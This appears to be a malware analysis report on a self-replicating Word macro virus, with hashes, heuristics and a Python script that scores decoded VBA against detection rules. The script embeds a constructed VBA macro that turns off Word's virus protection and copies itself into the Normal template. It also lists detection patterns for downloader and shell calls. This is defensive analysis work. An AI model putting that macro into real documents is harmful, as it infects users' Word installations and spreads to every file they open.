Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5e32bf2f72825bf0…

MALICIOUS

Office (OLE) / .DOC

Size: 68.0 KB
Created: 2009-09-01 14:32:00
Authoring application: Microsoft Word 11.2
MD5: 93bac305599355e3210c0192551cdc1f
SHA-1: 3f4d6252139335142fea267846b2c55294155dea
SHA-256: 5e32bf2f72825bf020cd3b925b93e3bd5a4568750029a6e949bd9ae7a17c96e7
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro that runs from the Document_Open event, so it executes as soon as the document is opened with macros enabled. The macro attempts to turn off Word's built-in macro virus protection and to copy itself into the Normal template, which Word loads in every session; this is classic macro-virus behaviour that gives the code persistence and lets it spread into documents opened later. The ClamAV detection Doc.Trojan.Thus-10, which fires on both the document and the carved macro source, corroborates the verdict. The artifact analysis rates an obfuscated or embedded payload as unlikely, so the observed behaviour is better read as self-replication than as a downloader for a second stage.

Heuristics 4

  • ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The VBA project defines a Document_Open handler, an auto-executing entry point that Word runs without further user interaction once macros are enabled.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
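One way to implement the macro heuristics listed above, as an added example that is not the analysis platform's own code: a small rule set is run over decoded VBA source (the kind of text olevba's extract_macros emits) and reports the rule IDs used in this report (OLE_VBA_MACROS, OLE_VBA_DOCOPEN) together with additional, assumed rules for the behaviours the summary describes (disabling virus protection, writing into the Normal template) and for the downloader/execution patterns that would indicate a second stage. The sample macro is constructed for the demonstration and is not the carved macros.bas; the extra rule IDs, the severity weights and the verdict thresholds are assumptions.

```python
"""Rule-based triage of decoded VBA source, modelled on the heuristic IDs in this report.

Added example, not the analysis platform's engine. Rule IDs other than OLE_VBA_MACROS
and OLE_VBA_DOCOPEN, the severity weights and the verdict thresholds are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str   # "high" or "medium"
    detail: str


# Constructed sample: a Document_Open macro that disables macro virus protection and
# copies its own module into the Normal template. It is NOT the macro carved from the sample.
SAMPLE_VBA = """\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Set src = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    Set dst = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    dst.DeleteLines 1, dst.CountOfLines
    dst.InsertLines 1, src.Lines(1, src.CountOfLines)
    NormalTemplate.Save
End Sub
"""

# Entry points Office runs without user interaction once macros are enabled.
AUTOEXEC_RE = re.compile(
    r"\bSub\s+(Document_Open|AutoOpen|Document_Close|AutoClose|AutoExec|Workbook_Open|Auto_Open)\b",
    re.IGNORECASE,
)

# (rule id, severity, regex, description); '.' does not cross lines, so each pattern is per line.
RULES = [
    ("OLE_VBA_DISABLE_AV", "high", r"\bVirusProtection\s*=\s*False\b",
     "turns off Word's built-in macro virus protection"),
    ("OLE_VBA_NORMAL_TEMPLATE", "high", r"\bNormalTemplate\b.*\bVBProject\b",
     "writes into the Normal template's VBA project (self-replication / persistence)"),
    ("OLE_VBA_VBPROJECT_ACCESS", "medium", r"\bVBProject\b|\bVBComponents\b|\bCodeModule\b",
     "reads or modifies VBA project code at runtime"),
    ("OLE_VBA_SAVENORMAL", "medium", r"\bSaveNormalPrompt\s*=\s*False\b",
     "suppresses the prompt shown when the Normal template is changed"),
    ("OLE_VBA_DOWNLOADER", "high", r"\bURLDownloadToFile\b|\bXMLHTTP\b|\bWinHttpRequest\b",
     "fetches content from a remote host (second-stage download)"),
    ("OLE_VBA_EXEC", "high", r"\bShell\s*\(|\bWScript\.Shell\b|\bCreateObject\s*\(",
     "spawns a process or instantiates a COM object"),
]

SEVERITY_WEIGHT = {"high": 40, "medium": 15}   # assumed weights, not the report's formula


def triage_vba(source: str) -> List[Finding]:
    """Return the heuristic findings for one decoded VBA module (empty input -> no findings)."""
    findings: List[Finding] = []
    if not source.strip():
        return findings
    findings.append(Finding("OLE_VBA_MACROS", "medium", "document contains VBA macro code"))
    m = AUTOEXEC_RE.search(source)
    if m:
        name = m.group(1)
        rule = "OLE_VBA_DOCOPEN" if name.lower() == "document_open" else "OLE_VBA_AUTOEXEC"
        findings.append(Finding(rule, "high", f"auto-executing entry point {name}"))
    for rule_id, severity, pattern, detail in RULES:
        if re.search(pattern, source, re.IGNORECASE):
            findings.append(Finding(rule_id, severity, detail))
    return findings


def risk_score(findings: List[Finding]) -> int:
    """Sum of the assumed per-severity weights."""
    return sum(SEVERITY_WEIGHT[f.severity] for f in findings)


def verdict(findings: List[Finding]) -> str:
    """MALICIOUS on any high-severity finding, SUSPICIOUS on medium only, else CLEAN."""
    severities = {f.severity for f in findings}
    if "high" in severities:
        return "MALICIOUS"
    if "medium" in severities:
        return "SUSPICIOUS"
    return "CLEAN"


if __name__ == "__main__":
    hits = triage_vba(SAMPLE_VBA)
    for f in hits:
        print(f"{f.rule_id:<26} {f.severity:<7} {f.detail}")
    print(f"risk score {risk_score(hits)} -> {verdict(hits)}")
```

On the constructed sample the downloader and process-execution rules stay silent while the template-infection rules fire, which is the distinction the summary draws: a self-replicating macro rather than a second-stage dropper. To use it on a real carved module, feed it the decoded text olevba emits for the VBA stream rather than the raw OLE container.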

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 2fdc9ff946bf1d1689e70a56afb8108046dc72df071fb69dc261414c52d254e0
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2370 bytes
Detection: ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely